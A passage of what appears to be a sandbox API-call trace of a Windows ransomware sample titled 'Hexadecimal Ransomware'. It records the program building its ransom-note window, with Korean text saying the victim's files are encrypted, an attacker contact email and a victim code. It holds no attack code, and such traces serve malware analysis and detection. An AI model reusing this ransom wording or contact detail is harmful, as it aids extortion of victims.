(lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x83, wParam=0x0, lParam=0x11fe1fc) returned 0x0 [0159.740] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x1, wParam=0x0, lParam=0x11fe210) returned 0x0 [0159.741] GetWindow (hWnd=0x102da, uCmd=0x3) returned 0x102d8 [0159.741] GetClientRect (in: hWnd=0x102da, lpRect=0x11fdebc | out: lpRect=0x11fdebc) returned 1 [0159.741] GetWindowRect (in: hWnd=0x102da, lpRect=0x11fdebc | out: lpRect=0x11fdebc) returned 1 [0159.741] GetParent (hWnd=0x102da) returned 0x202c8 [0159.741] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdebc, cPoints=0x2 | out: lpPoints=0x11fdebc) returned -13893822 [0159.741] SetWindowTextW (hWnd=0x102da, lpString="E-Mail: sealocker@daum.net") returned 1 [0159.741] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0xc, wParam=0x0, lParam=0x32c5120) returned 0x1 [0159.742] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x5, wParam=0x0, lParam=0x1000b5) returned 0x0 [0159.742] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x3, wParam=0x0, lParam=0x28d0261) returned 0x0 [0159.742] GetClientRect (in: hWnd=0x102da, lpRect=0x11fdf14 | out: lpRect=0x11fdf14) returned 1 [0159.742] GetWindowRect (in: hWnd=0x102da, lpRect=0x11fdf14 | out: lpRect=0x11fdf14) returned 1 [0159.742] GetParent (hWnd=0x102da) returned 0x202c8 [0159.742] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdf14, cPoints=0x2 | out: lpPoints=0x11fdf14) returned -13893822 [0159.742] SendMessageW (hWnd=0x102da, Msg=0x2210, wParam=0x2da0001, lParam=0x102da) returned 0x0 [0159.742] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x2210, wParam=0x2da0001, lParam=0x102da) returned 0x0 [0159.743] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.743] GetParent (hWnd=0x102da) returned 0x202c8 [0159.743] GetCurrentActCtx (in: lphActCtx=0x11fe7ec | out: lphActCtx=0x11fe7ec*=0x153972c) returned 1 [0159.743] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.744] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.744] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.STATIC.app.0.141b42a_r9_ad1", lpWindowName="Hexadecimal Code: FB 69FA 9979\r\n", dwStyle=0x5600000d, X=0, Y=559, nWidth=301, nHeight=24, hWndParent=0x202c8, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x102dc [0159.744] SetWindowLongW (hWnd=0x102dc, nIndex=-4, dwNewLong=1947511744) returned 93260590 [0159.745] GetWindowLongW (hWnd=0x102dc, nIndex=-4) returned 1947511744 [0159.745] SetWindowLongW (hWnd=0x102dc, nIndex=-4, dwNewLong=93260910) returned 1947511744 [0159.745] GetWindowLongW (hWnd=0x102dc, nIndex=-4) returned 93260910 [0159.745] GetWindowLongW (hWnd=0x102dc, nIndex=-16) returned 1174405133 [0159.745] GetWindowLongW (hWnd=0x102dc, nIndex=-12) returned 0 [0159.745] SetWindowLongW (hWnd=0x102dc, nIndex=-12, dwNewLong=66268) returned 0 [0159.745] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x81, wParam=0x0, lParam=0x11fe210) returned 0x1 [0159.746] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x83, wParam=0x0, lParam=0x11fe1fc) returned 0x0 [0159.746] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x1, wParam=0x0, lParam=0x11fe210) returned 0x0 [0159.747] GetWindow (hWnd=0x102dc, uCmd=0x3) returned 0x102da [0159.747] GetClientRect (in: hWnd=0x102dc, lpRect=0x11fdebc | out: lpRect=0x11fdebc) returned 1 [0159.747] GetWindowRect (in: hWnd=0x102dc, lpRect=0x11fdebc | out: lpRect=0x11fdebc) returned 1 [0159.747] GetParent (hWnd=0x102dc) returned 0x202c8 [0159.747] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdebc, cPoints=0x2 | out: lpPoints=0x11fdebc) returned -13893822 [0159.747] SetWindowTextW (hWnd=0x102dc, lpString="Hexadecimal Code: FB 69FA 9979\r\n") returned 1 [0159.747] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0xc, wParam=0x0, lParam=0x32c50b4) returned 0x1 [0159.748] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x5, wParam=0x0, lParam=0x18012d) returned 0x0 [0159.748] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x3, wParam=0x0, lParam=0x22f0000) returned 0x0 [0159.748] GetClientRect (in: hWnd=0x102dc, lpRect=0x11fdf14 | out: lpRect=0x11fdf14) returned 1 [0159.748] GetWindowRect (in: hWnd=0x102dc, lpRect=0x11fdf14 | out: lpRect=0x11fdf14) returned 1 [0159.748] GetParent (hWnd=0x102dc) returned 0x202c8 [0159.748] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdf14, cPoints=0x2 | out: lpPoints=0x11fdf14) returned -13893822 [0159.748] SendMessageW (hWnd=0x102dc, Msg=0x2210, wParam=0x2dc0001, lParam=0x102dc) returned 0x0 [0159.748] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x2210, wParam=0x2dc0001, lParam=0x102dc) returned 0x0 [0159.749] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.749] GetParent (hWnd=0x102dc) returned 0x202c8 [0159.749] GetCurrentActCtx (in: lphActCtx=0x11fe7ec | out: lphActCtx=0x11fe7ec*=0x153972c) returned 1 [0159.749] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.750] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.750] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r9_ad1", lpWindowName=0x0, dwStyle=0x56000000, X=123, Y=367, nWidth=535, nHeight=191, hWndParent=0x202c8, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x102de [0159.750] SetWindowLongW (hWnd=0x102de, nIndex=-4, dwNewLong=1950089536) returned 93259198 [0159.751] GetWindowLongW (hWnd=0x102de, nIndex=-4) returned 1950089536 [0159.751] SetWindowLongW (hWnd=0x102de, nIndex=-4, dwNewLong=93260950) returned 1950089536 [0159.751] GetWindowLongW (hWnd=0x102de, nIndex=-4) returned 93260950 [0159.751] GetWindowLongW (hWnd=0x102de, nIndex=-16) returned 1174405120 [0159.751] GetWindowLongW (hWnd=0x102de, nIndex=-12) returned 0 [0159.751] SetWindowLongW (hWnd=0x102de, nIndex=-12, dwNewLong=66270) returned 0 [0159.751] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x81, wParam=0x0, lParam=0x11fe210) returned 0x1 [0159.752] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x83, wParam=0x0, lParam=0x11fe1fc) returned 0x0 [0159.752] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x1, wParam=0x0, lParam=0x11fe210) returned 0x0 [0159.752] GetWindow (hWnd=0x102de, uCmd=0x3) returned 0x102dc [0159.752] GetClientRect (in: hWnd=0x102de, lpRect=0x11fdef8 | out: lpRect=0x11fdef8) returned 1 [0159.752] GetWindowRect (in: hWnd=0x102de, lpRect=0x11fdef8 | out: lpRect=0x11fdef8) returned 1 [0159.752] GetParent (hWnd=0x102de) returned 0x202c8 [0159.752] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdef8, cPoints=0x2 | out: lpPoints=0x11fdef8) returned -13893822 [0159.753] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x5, wParam=0x0, lParam=0xbf0217) returned 0x0 [0159.753] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x3, wParam=0x0, lParam=0x16f007b) returned 0x0 [0159.753] GetClientRect (in: hWnd=0x102de, lpRect=0x11fdf50 | out: lpRect=0x11fdf50) returned 1 [0159.753] GetWindowRect (in: hWnd=0x102de, lpRect=0x11fdf50 | out: lpRect=0x11fdf50) returned 1 [0159.753] GetParent (hWnd=0x102de) returned 0x202c8 [0159.753] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdf50, cPoints=0x2 | out: lpPoints=0x11fdf50) returned -13893822 [0159.753] SendMessageW (hWnd=0x102de, Msg=0x2210, wParam=0x2de0001, lParam=0x102de) returned 0x0 [0159.753] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x2210, wParam=0x2de0001, lParam=0x102de) returned 0x0 [0159.754] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.754] GetParent (hWnd=0x102de) returned 0x202c8 [0159.754] GetCurrentActCtx (in: lphActCtx=0x11fe7ec | out: lphActCtx=0x11fe7ec*=0x153972c) returned 1 [0159.754] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.755] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.755] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.STATIC.app.0.141b42a_r9_ad1", lpWindowName="oops! 당신의 파일이 암호화 되었습니다!", dwStyle=0x5600000d, X=138, Y=0, nWidth=369, nHeight=29, hWndParent=0x202c8, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x102e0 [0159.755] SetWindowLongW (hWnd=0x102e0, nIndex=-4, dwNewLong=1947511744) returned 93260590 [0159.756] GetWindowLongW (hWnd=0x102e0, nIndex=-4) returned 1947511744 [0159.758] SetWindowLongW (hWnd=0x102e0, nIndex=-4, dwNewLong=93258934) returned 1947511744 [0159.758] GetWindowLongW (hWnd=0x102e0, nIndex=-4) returned 93258934 [0159.758] GetWindowLongW (hWnd=0x102e0, nIndex=-16) returned 1174405133 [0159.758] GetWindowLongW (hWnd=0x102e0, nIndex=-12) returned 0 [0159.758] SetWindowLongW (hWnd=0x102e0, nIndex=-12, dwNewLong=66272) returned 0 [0159.758] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x81, wParam=0x0, lParam=0x11fe210) returned 0x1 [0159.759] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x83, wParam=0x0, lParam=0x11fe1fc) returned 0x0 [0159.759] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x1, wParam=0x0, lParam=0x11fe210) returned 0x0 [0159.760] GetWindow (hWnd=0x102e0, uCmd=0x3) returned 0x102de [0159.760] GetClientRect (in: hWnd=0x102e0, lpRect=0x11fdebc | out: lpRect=0x11fdebc) returned 1 [0159.760] GetWindowRect (in: hWnd=0x102e0, lpRect=0x11fdebc | out: lpRect=0x11fdebc) returned 1 [0159.760] GetParent (hWnd=0x102e0) returned 0x202c8 [0159.760] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdebc, cPoints=0x2 | out: lpPoints=0x11fdebc) returned -13893822 [0159.761] SetWindowTextW (hWnd=0x102e0, lpString="oops! 당신의 파일이 암호화 되었습니다!") returned 1 [0159.761] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0xc, wParam=0x0, lParam=0x32c5058) returned 0x1 [0159.761] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x5, wParam=0x0, lParam=0x1d0171) returned 0x0 [0159.761] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x3, wParam=0x0, lParam=0x8a) returned 0x0 [0159.761] GetClientRect (in: hWnd=0x102e0, lpRect=0x11fdf14 | out: lpRect=0x11fdf14) returned 1 [0159.762] GetWindowRect (in: hWnd=0x102e0, lpRect=0x11fdf14 | out: lpRect=0x11fdf14) returned 1 [0159.762] GetParent (hWnd=0x102e0) returned 0x202c8 [0159.762] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdf14, cPoints=0x2 | out: lpPoints=0x11fdf14) returned -13893822 [0159.762] SendMessageW (hWnd=0x102e0, Msg=0x2210, wParam=0x2e00001, lParam=0x102e0) returned 0x0 [0159.762] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x2210, wParam=0x2e00001, lParam=0x102e0) returned 0x0 [0159.762] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.763] GetParent (hWnd=0x102e0) returned 0x202c8 [0159.763] GetCurrentActCtx (in: lphActCtx=0x11fe7ec | out: lphActCtx=0x11fe7ec*=0x153972c) returned 1 [0159.763] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.763] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.763] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r9_ad1", lpWindowName=0x0, dwStyle=0x56000000, X=0, Y=0, nWidth=138, nHeight=174, hWndParent=0x202c8, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x102e2 [0159.764] SetWindowLongW (hWnd=0x102e2, nIndex=-4, dwNewLong=1950089536) returned 93259198 [0159.764] GetWindowLongW (hWnd=0x102e2, nIndex=-4) returned 1950089536 [0159.764] SetWindowLongW (hWnd=0x102e2, nIndex=-4, dwNewLong=93273710) returned 1950089536 [0159.765] GetWindowLongW (hWnd=0x102e2, nIndex=-4) returned 93273710 [0159.765] GetWindowLongW (hWnd=0x102e2, nIndex=-16) returned 1174405120 [0159.765] GetWindowLongW (hWnd=0x102e2, nIndex=-12) returned 0 [0159.765] SetWindowLongW (hWnd=0x102e2, nIndex=-12, dwNewLong=66274) returned 0 [0159.765] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x81, wParam=0x0, lParam=0x11fe210) returned 0x1 [0159.770] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x83, wParam=0x0, lParam=0x11fe1fc) returned 0x0 [0159.770] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x1, wParam=0x0, lParam=0x11fe210) returned 0x0 [0159.770] GetWindow (hWnd=0x102e2, uCmd=0x3) returned 0x102e0 [0159.770] GetClientRect (in: hWnd=0x102e2, lpRect=0x11fdef8 | out: lpRect=0x11fdef8) returned 1 [0159.771] GetWindowRect (in: hWnd=0x102e2, lpRect=0x11fdef8 | out: lpRect=0x11fdef8) returned 1 [0159.771] GetParent (hWnd=0x102e2) returned 0x202c8 [0159.771] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdef8, cPoints=0x2 | out: lpPoints=0x11fdef8) returned -13893822 [0159.771] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x5, wParam=0x0, lParam=0xae008a) returned 0x0 [0159.772] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0159.772] GetClientRect (in: hWnd=0x102e2, lpRect=0x11fdf50 | out: lpRect=0x11fdf50) returned 1 [0159.772] GetWindowRect (in: hWnd=0x102e2, lpRect=0x11fdf50 | out: lpRect=0x11fdf50) returned 1 [0159.772] GetParent (hWnd=0x102e2) returned 0x202c8 [0159.772] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdf50, cPoints=0x2 | out: lpPoints=0x11fdf50) returned -13893822 [0159.772] SendMessageW (hWnd=0x102e2, Msg=0x2210, wParam=0x2e20001, lParam=0x102e2) returned 0x0 [0159.772] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x2210, wParam=0x2e20001, lParam=0x102e2) returned 0x0 [0159.772] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.772] GetParent (hWnd=0x102e2) returned 0x202c8 [0159.772] GetCurrentActCtx (in: lphActCtx=0x11fe7ec | out: lphActCtx=0x11fe7ec*=0x153972c) returned 1 [0159.773] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.773] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.773] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r9_ad1", lpWindowName=0x0, dwStyle=0x56000000, X=0, Y=0, nWidth=658, nHeight=558, hWndParent=0x202c8, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x102e4 [0159.774] SetWindowLongW (hWnd=0x102e4, nIndex=-4, dwNewLong=1950089536) returned 93259198 [0159.774] GetWindowLongW (hWnd=0x102e4, nIndex=-4) returned 1950089536 [0159.774] SetWindowLongW (hWnd=0x102e4, nIndex=-4, dwNewLong=93273230) returned 1950089536 [0159.775] GetWindowLongW (hWnd=0x102e4, nIndex=-4) returned 93273230 [0159.775] GetWindowLongW (hWnd=0x102e4, nIndex=-16) returned 1174405120 [0159.775] GetWindowLongW (hWnd=0x102e4, nIndex=-12) returned 0 [0159.775] SetWindowLongW (hWnd=0x102e4, nIndex=-12, dwNewLong=66276) returned 0 [0159.775] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x81, wParam=0x0, lParam=0x11fe210) returned 0x1 [0159.775] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x83, wParam=0x0, lParam=0x11fe1fc) returned 0x0 [0159.776] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x1, wParam=0x0, lParam=0x11fe210) returned 0x0 [0159.776] GetWindow (hWnd=0x102e4, uCmd=0x3) returned 0x102e2 [0159.776] GetClientRect (in: hWnd=0x102e4, lpRect=0x11fdef8 | out: lpRect=0x11fdef8) returned 1 [0159.776] GetWindowRect (in: hWnd=0x102e4, lpRect=0x11fdef8 | out: lpRect=0x11fdef8) returned 1 [0159.776] GetParent (hWnd=0x102e4) returned 0x202c8 [0159.776] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdef8, cPoints=0x2 | out: lpPoints=0x11fdef8) returned -13893822 [0159.778] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x5, wParam=0x0, lParam=0x22e0292) returned 0x0 [0159.778] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0159.778] GetClientRect (in: hWnd=0x102e4, lpRect=0x11fdf50 | out: lpRect=0x11fdf50) returned 1 [0159.778] GetWindowRect (in: hWnd=0x102e4, lpRect=0x11fdf50 | out: lpRect=0x11fdf50) returned 1 [0159.778] GetParent (hWnd=0x102e4) returned 0x202c8 [0159.778] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdf50, cPoints=0x2 | out: lpPoints=0x11fdf50) returned -13893822 [0159.778] SendMessageW (hWnd=0x102e4, Msg=0x2210, wParam=0x2e40001, lParam=0x102e4) returned 0x0 [0159.778] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x2210, wParam=0x2e40001, lParam=0x102e4) returned 0x0 [0159.778] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.779] GetParent (hWnd=0x102e4) returned 0x202c8 [0159.779] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0159.779] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0159.779] GetSystemMetrics (nIndex=42) returned 0 [0159.779] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe774, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0159.779] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe774) returned 0x16 [0159.812] InvalidateRect (hWnd=0x202ca, lpRect=0x0, bErase=1) returned 1 [0159.812] InvalidateRect (hWnd=0x102d2, lpRect=0x0, bErase=1) returned 1 [0159.812] InvalidateRect (hWnd=0x102d4, lpRect=0x0, bErase=1) returned 1 [0159.812] InvalidateRect (hWnd=0x102d6, lpRect=0x0, bErase=1) returned 1 [0159.812] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0159.812] InvalidateRect (hWnd=0x102da, lpRect=0x0, bErase=1) returned 1 [0159.812] InvalidateRect (hWnd=0x102dc, lpRect=0x0, bErase=1) returned 1 [0159.813] InvalidateRect (hWnd=0x102de, lpRect=0x0, bErase=1) returned 1 [0159.813] InvalidateRect (hWnd=0x102e0, lpRect=0x0, bErase=1) returned 1 [0159.813] InvalidateRect (hWnd=0x102e2, lpRect=0x0, bErase=1) returned 1 [0159.813] InvalidateRect (hWnd=0x102e4, lpRect=0x0, bErase=1) returned 1 [0159.813] GetWindowThreadProcessId (in: hWnd=0x202c8, lpdwProcessId=0x11fe800 | out: lpdwProcessId=0x11fe800) returned 0x778 [0159.813] GetCurrentThreadId () returned 0x778 [0159.814] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc1b8 [0159.815] PostMessageW (hWnd=0x202c8, Msg=0xc1b8, wParam=0x0, lParam=0x0) returned 1 [0159.815] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0159.815] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0159.815] GetSystemMetrics (nIndex=42) returned 0 [0159.815] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe75c, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0159.815] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe75c) returned 0x16 [0159.816] GdipImageGetFrameDimensionsCount (image=0x6e0f260, count=0x11fe754) returned 0x0 [0159.817] GdipImageGetFrameDimensionsList (image=0x6e0f260, dimensionIDs=0x1561538*(Data1=0x74737953, Data2=0x6d65, Data3=0x442e, Data4=([0]=0x72, [1]=0x61, [2]=0x77, [3]=0x69, [4]=0x6e, [5]=0x67, [6]=0x0, [7]=0x0)), count=0x1) returned 0x0 [0159.820] LocalFree (hMem=0x1561538) returned 0x0 [0160.026] GdipImageGetFrameDimensionsCount (image=0x6e18c80, count=0x11fe754) returned 0x0 [0160.026] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1561688 [0160.026] GdipImageGetFrameDimensionsList (image=0x6e18c80, dimensionIDs=0x1561688*(Data1=0x550c0254, Data2=0x726e, Data3=0x7365, Data4=([0]=0x74, [1]=0x72, [2]=0x69, [3]=0x63, [4]=0x74, [5]=0x65, [6]=0x64, [7]=0x1)), count=0x1) returned 0x0 [0160.027] LocalFree (hMem=0x1561688) returned 0x0 [0160.027] GdipImageGetFrameDimensionsCount (image=0x6e19248, count=0x11fe754) returned 0x0 [0160.027] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1561688 [0160.027] GdipImageGetFrameDimensionsList (image=0x6e19248, dimensionIDs=0x1561688*(Data1=0x7462dc86, Data2=0x6180, Data3=0x4c7e, Data4=([0]=0x8e, [1]=0x3f, [2]=0xee, [3]=0x73, [4]=0x33, [5]=0xa7, [6]=0xa4, [7]=0x83)), count=0x1) returned 0x0 [0160.027] LocalFree (hMem=0x1561688) returned 0x0 [0160.027] GdipImageGetFrameDimensionsCount (image=0x6e19848, count=0x11fe754) returned 0x0 [0160.027] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1561478 [0160.027] GdipImageGetFrameDimensionsList (image=0x6e19848, dimensionIDs=0x1561478*(Data1=0x74737953, Data2=0x6d65, Data3=0x442e, Data4=([0]=0x72, [1]=0x61, [2]=0x77, [3]=0x69, [4]=0x6e, [5]=0x67, [6]=0x0, [7]=0x0)), count=0x1) returned 0x0 [0160.027] LocalFree (hMem=0x1561478) returned 0x0 [0160.028] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x46, wParam=0x0, lParam=0x11fec14) returned 0x0 [0160.149] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x46, wParam=0x0, lParam=0x11fec14) returned 0x0 [0160.149] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0160.149] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0160.151] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0160.157] OleInitialize (pvReserved=0x0) returned 0x0 [0160.158] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x11fe954 | out: lplpMessageFilter=0x11fe954*=0x0) returned 0x0 [0160.160] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0160.161] GetFocus () returned 0x0 [0160.161] SetFocus (hWnd=0x102d8) returned 0x0 [0160.655] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0160.665] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0160.667] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0160.667] GetParent (hWnd=0x202c8) returned 0x0 [0160.667] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0160.669] GetStockObject (i=5) returned 0x900015 [0160.718] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0160.719] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0xd, wParam=0x5, lParam=0x1561808) returned 0x4 [0160.731] GetDlgItem (hDlg=0x202c8, nIDDlgItem=66264) returned 0x102d8 [0160.731] SendMessageW (hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fe274) returned 0x0 [0160.731] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fe274) returned 0x0 [0160.732] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0160.732] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0160.732] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0160.733] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x1 [0160.733] SetTextColor (hdc=0x10105d6, color=0x0) returned 0x0 [0160.734] SetBkColor (hdc=0x10105d6, color=0xffffff) returned 0xffffff [0160.854] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe324 | out: lpwndpl=0x11fe324) returned 1 [0160.854] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe2d0 | out: lpRect=0x11fe2d0) returned 1 [0160.854] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0160.854] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0160.854] GetSystemMetrics (nIndex=42) returned 0 [0160.854] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe178, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0160.854] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe178) returned 0x16 [0160.854] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe1d8 | out: lpRect=0x11fe1d8) returned 1 [0160.856] GetSystemMetrics (nIndex=80) returned 1 [0161.156] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x58f3df6, dwData=0x0) returned 1 [0161.170] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x11fde38 | out: lpmi=0x11fde38) returned 1 [0161.170] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x3010825 